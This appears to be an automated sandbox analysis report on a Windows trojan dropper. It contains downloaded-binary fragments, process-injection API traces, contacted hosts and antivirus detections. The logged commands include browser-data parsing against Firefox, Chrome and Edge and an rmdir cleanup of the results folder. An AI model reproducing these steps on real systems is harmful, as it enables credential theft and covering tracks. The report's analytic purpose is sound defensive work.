recv April 23, 2021, 9:57 a.m.	buffer: HTTP/1.1 200 OK Date: Fri, 23 Apr 2021 01:10:11 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sun, 07 Mar 2021 21:18:22 GMT ETag: "723900-5bcf8db608380" Accept-Ranges: bytes Content-Length: 7485696 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEdåkí_àéR7ð'é @p £ár Õ¯SP 0V¨T(.textîìLàpà.sedata@î2òL è.idataP $i@È.sedata` (i@@¯ìNo0r¦JÞ¦§\|pÄùÈª¿ù2¢E3k)\|\|5KcìX8>+Ð\|ZJÉr®eiWÝ¥ì.aÞVÎ¢P¸Â>¿ð?íT}ÌK3kÄÏï¯f8¦Ò»(IÚßÂw-^SÌ¶8ëûÊ¹^þëØâÅÁ²×gÐlh<eí4>»Ók^\|}Ðc0TzT+þl±l5¢«¨¹$EÔÖ% Ýî3R:#2¯þñ¶²LìöO!PÌýã Wè½åþkr0±âb¯¨îØ"ÓT÷BR²4ÙÍÐoÂXÅïò¿°?©\|ÇKcö]PÈm}yµ_s9jw}I+¯TèpÀä ¢TñkyÝÌÀ\|iÅÓVqTÉìÄyh¨Cî ¯´m4íÙ±¨ù8¾Ð{ïY7lÖ'Á.½'AÁá&«ÊøFÛð]xCÿ§Á;!LªÝ¦èFJ0©êø[i~ÓÇþV'Þªdm¯¼ n\|\|¢ÍT\|ù®9õÿÅøF ô1aº·üö°ýÖøæzÚ´H§d7¤sô³¢^hk5°Ma-H´"Æ9j«^6Òæ½¶)\äd ?ÊP¤×çVÜ{jë"Î ¿6Àg¬ÕúqÞºÉ i"rãepD ,6js¶=S&Ùc¼eËÕè.fþ¸£Ò'î¨ÏW) IÖ+[D£©+¹ä ò6ùË(Êo¬¾@-\¡«Þ0Ú1hFcuYbyÆvN!#¬Â²h·A«"2yd\"ÿtºLô¸½÷Ú!ÞRJQ¹µý!zþÞ{Ø.TYú$K?§qÒÊDN·U{×E8KþÚ@Ë¦³ïáÛÃNª%®Ø9? ~lãoJFýæðÓ¿älÐyÉÏÈïZç1HQbhPÉ¯v]Ì@®è#û+'ï°áØM°F\|µp¶éð1LOÊ²Ï®l)Üü$÷x×Asaif@tÖÒýÌöíG£ªÕ¸À>Âý~}S-rgìÏË¾A[rÅ¯,É¡×Ý-Dß¨3:ñ+& (LMRù5,úºÐèÆ)2¿xÅqÝ5jZ%õ¢µJsÔNc »«÷jùðu1ÝgâPU2ô}ª/olG³«á^ë received: 2840 socket: 252	1	2840	0
recv April 23, 2021, 9:57 a.m.	buffer: HTTP/1.1 200 OK Date: Fri, 23 Apr 2021 01:10:13 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sat, 27 Feb 2021 16:12:36 GMT ETag: "431278-5bc53a723c500" Accept-Ranges: bytes Content-Length: 4395640 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEdwqÐ_ð.#1ôBR@ÀCXÈC` ÐB1àB0C@P?¤Cx@CÐv`,?(<êB .textò01`Ð`.datapW1X1@`À.rdatapÞ p1à h1@p@.pdata¤P?H?@0@.xdata¸wð@xÚ@@@@.bsspQpB`À.edata1ÐBRB@0@.idataàB,TB@0À.CRThCB@@À.tls CB@@À.rsrc@0CB@0À.relocÐv@CxB@0B received: 2840 socket: 252	1	2840	0

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x0000d600', u'virtual_address': u'0x00063000', u'entropy': 6.855402526678264, u'name': u'.rsrc', u'virtual_size': u'0x0000d470'}

entropy

6.85540252668

description

A section with a high entropy has been found

Connects to an IRC server, possibly part of a botnet

Communicates with host for which no DNS query was performed (2 events)

host	172.217.25.14
host	35.220.235.49

Detects the presence of Wine emulator (3 events)

Time & API	Arguments	Return
LdrGetProcedureAddress April 23, 2021, 9:58 a.m.	ordinal: 0 function_address: 0x000007feff017a50 function_name: wine_get_version module: ntdll module_address: 0x00000000771c0000	-1073741511
LdrGetProcedureAddress April 23, 2021, 9:58 a.m.	ordinal: 0 function_address: 0x000007feff017a50 function_name: wine_get_version module: ntdll module_address: 0x00000000771c0000	-1073741511
LdrGetProcedureAddress April 23, 2021, 9:58 a.m.	ordinal: 0 function_address: 0x000007feff017a50 function_name: wine_get_version module: ntdll module_address: 0x00000000771c0000	-1073741511

Executed a process and injected code into it, probably while unpacking (50 events)

Time & API	Arguments	Status	Return
NtResumeThread April 23, 2021, 10:04 a.m.	thread_handle: 0x0000017c suspend_count: 1 process_identifier: 3236	1	0
CreateProcessInternalW April 23, 2021, 10:04 a.m.	thread_identifier: 8232 thread_handle: 0x000002dc process_identifier: 4232 current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0 filepath: C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002d4	1	1
NtGetContextThread April 23, 2021, 9:57 a.m.	thread_handle: 0xfffffffffffffffe	1	0
NtSetContextThread April 23, 2021, 9:57 a.m.	registers.r14: 8796092887632 registers.r15: 48 registers.rcx: 6629298656858961778 registers.rsi: 5369553405 registers.r10: 5368709159 registers.rbx: 5369554524 registers.rsp: 5369553790 registers.r11: 5369776951 registers.r8: 1070656059720 registers.r9: 5369712797 registers.rip: 64530 registers.rdx: 5369553868 registers.r12: 519 registers.rbp: 1026935958146 registers.rdi: 5369553184 registers.rax: 5369591581 registers.r13: -1320563801 thread_handle: 0xfffffffffffffffe process_identifier: 4232	1	0
NtResumeThread April 23, 2021, 9:57 a.m.	thread_handle: 0x0000000000000064 suspend_count: 0 process_identifier: 4232	1	0
NtGetContextThread April 23, 2021, 9:57 a.m.	thread_handle: 0xfffffffffffffffe	1	0
NtSetContextThread April 23, 2021, 9:57 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 0 registers.r11: 0 registers.r8: 51 registers.r9: 2199026073600 registers.rip: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 0 registers.rdi: 34634617323547 registers.rax: 0 registers.r13: 0 thread_handle: 0xfffffffffffffffe process_identifier: 4232	1	0
NtResumeThread April 23, 2021, 9:57 a.m.	thread_handle: 0x0000000000000104 suspend_count: 0 process_identifier: 4232	1	0
NtGetContextThread April 23, 2021, 9:57 a.m.	thread_handle: 0xfffffffffffffffe	1	0
CreateProcessInternalW April 23, 2021, 9:57 a.m.	thread_identifier: 5640 thread_handle: 0x0000000000000068 process_identifier: 3660 current_directory: filepath: track: 1 command_line: parse.exe -f json -b firefox filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x0000000000000074	1	1
CreateProcessInternalW April 23, 2021, 9:57 a.m.	thread_identifier: 7236 thread_handle: 0x0000000000000068 process_identifier: 2848 current_directory: filepath: track: 1 command_line: parse.exe -f json -b chrome filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x0000000000000074	1	1
CreateProcessInternalW April 23, 2021, 9:57 a.m.	thread_identifier: 7940 thread_handle: 0x0000000000000068 process_identifier: 4792 current_directory: filepath: track: 1 command_line: parse.exe -f json -b edge filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x0000000000000074	1	1
NtResumeThread April 23, 2021, 9:57 a.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 4232	1	0
NtGetContextThread April 23, 2021, 9:57 a.m.	thread_handle: 0xfffffffffffffffe	1	0
CreateProcessInternalW April 23, 2021, 9:58 a.m.	thread_identifier: 0 thread_handle: 0x0000000000000000 process_identifier: 0 current_directory: filepath: track: 0 command_line: rmdir /s/q C:\Users\test22\AppData\Local\Temp\RarSFX0\results filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x0000000000000000		0
NtGetContextThread April 23, 2021, 9:58 a.m.	thread_handle: 0xfffffffffffffffe	1	0
NtSetContextThread April 23, 2021, 9:58 a.m.	registers.r14: 15597568 registers.r15: 2291392 registers.rcx: 1394708509601300480 registers.rsi: 1365938799961 registers.r10: 8623489024 registers.rbx: 58111 registers.rsp: 19924325 registers.r11: 20457326 registers.r8: 29611918 registers.r9: 627689198084866744 registers.rip: 0 registers.rdx: -1203587000414764752 registers.r12: 514 registers.rbp: 515 registers.rdi: 19923196 registers.rax: 334278999146800 registers.r13: 0 thread_handle: 0xfffffffffffffffe process_identifier: 3660	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x000000000000006c suspend_count: 0 process_identifier: 3660	1	0
NtGetContextThread April 23, 2021, 9:58 a.m.	thread_handle: 0xfffffffffffffffe	1	0
NtSetContextThread April 23, 2021, 9:58 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 0 registers.r11: 0 registers.r8: 51 registers.r9: 2199026073600 registers.rip: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 0 registers.rdi: 34634617323547 registers.rax: 0 registers.r13: 0 thread_handle: 0xfffffffffffffffe process_identifier: 3660	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x00000000000000b4 suspend_count: 1 process_identifier: 3660	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x00000000000000b8 suspend_count: 1 process_identifier: 3660	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x00000000000000bc suspend_count: 1 process_identifier: 3660	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x00000000000000e8 suspend_count: 1 process_identifier: 3660	1	0
NtGetContextThread April 23, 2021, 9:58 a.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x0000000000000118 suspend_count: 1 process_identifier: 3660	1	0
NtGetContextThread April 23, 2021, 9:58 a.m.	thread_handle: 0xfffffffffffffffe	1	0
NtSetContextThread April 23, 2021, 9:58 a.m.	registers.r14: 15597568 registers.r15: 2291392 registers.rcx: 1394708509601300480 registers.rsi: 1365938799961 registers.r10: 8623489024 registers.rbx: 58111 registers.rsp: 19924325 registers.r11: 20457326 registers.r8: 29611918 registers.r9: 627689198084866744 registers.rip: 0 registers.rdx: -1203587000414764752 registers.r12: 514 registers.rbp: 515 registers.rdi: 19923196 registers.rax: 334278999146800 registers.r13: 0 thread_handle: 0xfffffffffffffffe process_identifier: 2848	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x000000000000006c suspend_count: 0 process_identifier: 2848	1	0
NtGetContextThread April 23, 2021, 9:58 a.m.	thread_handle: 0xfffffffffffffffe	1	0
NtSetContextThread April 23, 2021, 9:58 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 0 registers.r11: 0 registers.r8: 51 registers.r9: 2199026073600 registers.rip: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 0 registers.rdi: 34634617323547 registers.rax: 0 registers.r13: 0 thread_handle: 0xfffffffffffffffe process_identifier: 2848	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x00000000000000b4 suspend_count: 1 process_identifier: 2848	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x00000000000000b8 suspend_count: 1 process_identifier: 2848	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x00000000000000bc suspend_count: 1 process_identifier: 2848	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x00000000000000e8 suspend_count: 1 process_identifier: 2848	1	0
NtGetContextThread April 23, 2021, 9:58 a.m.	thread_handle: 0x000000000000016c	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x000000000000016c suspend_count: 1 process_identifier: 2848	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x000000000000016c suspend_count: 0 process_identifier: 2848	1	0
NtGetContextThread April 23, 2021, 9:58 a.m.	thread_handle: 0xfffffffffffffffe	1	0
NtGetContextThread April 23, 2021, 9:58 a.m.	thread_handle: 0x0000000000000174	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x0000000000000174 suspend_count: 1 process_identifier: 2848	1	0
NtGetContextThread April 23, 2021, 9:58 a.m.	thread_handle: 0xfffffffffffffffe	1	0
NtSetContextThread April 23, 2021, 9:58 a.m.	registers.r14: 15597568 registers.r15: 2291392 registers.rcx: 1394708509601300480 registers.rsi: 1365938799961 registers.r10: 8623489024 registers.rbx: 58111 registers.rsp: 19924325 registers.r11: 20457326 registers.r8: 29611918 registers.r9: 627689198084866744 registers.rip: 0 registers.rdx: -1203587000414764752 registers.r12: 514 registers.rbp: 515 registers.rdi: 19923196 registers.rax: 334278999146800 registers.r13: 0 thread_handle: 0xfffffffffffffffe process_identifier: 4792	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x000000000000006c suspend_count: 0 process_identifier: 4792	1	0
NtGetContextThread April 23, 2021, 9:58 a.m.	thread_handle: 0xfffffffffffffffe	1	0
NtSetContextThread April 23, 2021, 9:58 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 0 registers.r11: 0 registers.r8: 51 registers.r9: 2199026073600 registers.rip: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 0 registers.rdi: 34634617323547 registers.rax: 0 registers.r13: 0 thread_handle: 0xfffffffffffffffe process_identifier: 4792	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x00000000000000b4 suspend_count: 1 process_identifier: 4792	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x00000000000000b8 suspend_count: 1 process_identifier: 4792	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x00000000000000bc suspend_count: 1 process_identifier: 4792	1	0
NtResumeThread April 23, 2021, 9:58 a.m.	thread_handle: 0x00000000000000dc suspend_count: 1 process_identifier: 4792	1	0

File has been identified by 42 AntiVirus engines on VirusTotal as malicious (42 events)

Bkav	W32.AIDetect.malware2
Elastic	malicious (high confidence)
DrWeb	Trojan.BPlug.3891
MicroWorld-eScan	Trojan.Rasftuby.Gen.14
ALYac	Trojan.Rasftuby.Gen.14
Cylance	Unsafe
Zillya	Trojan.ScriptKD.JS.10
Sangfor	Trojan.Win32.Wacatac.B
K7AntiVirus	Riskware ( 0040eff71 )
Alibaba	TrojanDropper:Win64/DropperX.52335e60
K7GW	Riskware ( 0040eff71 )
Cybereason	malicious.4f95c4
Arcabit	Trojan.Rasftuby.Gen.14
Cyren	W64/Trojan.FTSR-8271
Symantec	Trojan.Gen.MBT
APEX	Malicious
Avast	Win64:DropperX-gen [Drp]
ClamAV	Win.Malware.Rasftuby-9828908-0
BitDefender	Trojan.Rasftuby.Gen.14
Paloalto	generic.ml
Ad-Aware	Trojan.Rasftuby.Gen.14
Sophos	ML/PE-A
McAfee-GW-Edition	BehavesLike.Win32.GenericRX.vc
FireEye	Generic.mg.71832d24f95c424d
Emsisoft	Trojan.Rasftuby.Gen.14 (B)
SentinelOne	Static AI - Suspicious SFX
eGambit	Unsafe.AI_Score_91%
Avira	HEUR/AGEN.1113311
MAX	malware (ai score=100)
Gridinsoft	Trojan.Win32.Agent.ns
Microsoft	Trojan:Win32/Tiggre!rfn
AegisLab	Trojan.Win32.Rasftuby.4!c
GData	Trojan.Rasftuby.Gen.14
Cynet	Malicious (score: 100)
AhnLab-V3	Malware/Win32.RL_Generic.R360804
McAfee	Artemis!71832D24F95C
Malwarebytes	Trojan.BrowserModifier.SFX
TrendMicro-HouseCall	TROJ_GEN.R002H09DK21
Ikarus	PUA.NoobyProtect
Fortinet	Riskware/Application
AVG	Win64:DropperX-gen [Drp]
CrowdStrike	win/malicious_confidence_70% (W)

request1.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All